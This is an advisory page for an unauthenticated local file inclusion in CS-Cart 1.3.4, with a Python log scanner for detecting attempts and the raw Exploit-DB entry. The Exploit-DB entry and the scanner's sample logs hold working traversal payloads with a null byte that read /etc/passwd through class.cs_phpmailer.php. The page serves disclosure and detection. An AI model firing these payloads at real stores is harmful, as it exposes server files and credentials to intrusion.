Vendor: CS-Cart
By: 0xmmnbassel
CVSS: 8.8 (HIGH)
Vulnerability Type: unauthenticated LFI
CWE: 20
Product Name: CS-Cart
Affected Version From: 1.3.4 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:cs-cart:cs-cart
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

CS-Cart unauthenticated LFI

An unauthenticated local file inclusion (LFI) vulnerability exists in CS-Cart versions prior to 1.3.4. An attacker can exploit it by sending a crafted HTTP request to classes/phpmailer/class.cs_phpmailer.php on the vulnerable server. The request carries a malicious classes_dir parameter containing directory traversal sequences and a trailing null byte (%00), which can be used to read arbitrary files from the server.

Mitigation:

Upgrade to the latest version of CS-Cart to mitigate this vulnerability.
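
For hosts that cannot be upgraded immediately, web server access logs can be reviewed for requests that set classes_dir on this script. The following is an added example, not part of the original advisory or Exploit-DB entry; it assumes combined-format access logs, and the sample lines, function names and reason strings are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter named in the advisory.
TARGET = "/classes/phpmailer/class.cs_phpmailer.php"
PARAM = "classes_dir"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e (bounded number of passes)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(log_line):
    """Return None, or a sorted list of reasons the request is suspicious."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not fully_decode(url.path).lower().endswith(TARGET):
        return None
    reasons = set()
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        # Assumption: legitimate clients never supply this parameter themselves.
        reasons.add("client-supplied classes_dir")
        value = fully_decode(raw).replace("\\", "/")
        if "\x00" in value:
            reasons.add("null byte")
        if "../" in value or value.startswith("/"):
            reasons.add("path traversal")
    return sorted(reasons) or None

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2020:10:00:01 +0000] "GET /index.php?dispatch=products.view HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Sep/2020:10:00:07 +0000] "GET /shop/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.44 - - [22/Sep/2020:10:00:09 +0000] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 1843',
]

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    return [(i, r) for i, l in enumerate(lines, 1) if (r := classify(l))]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(lineno, ", ".join(reasons))
```

A 200 response with a non-trivial body size on a flagged line is worth prioritising, since it suggests the include returned content.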

Exploit-DB raw data:

# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00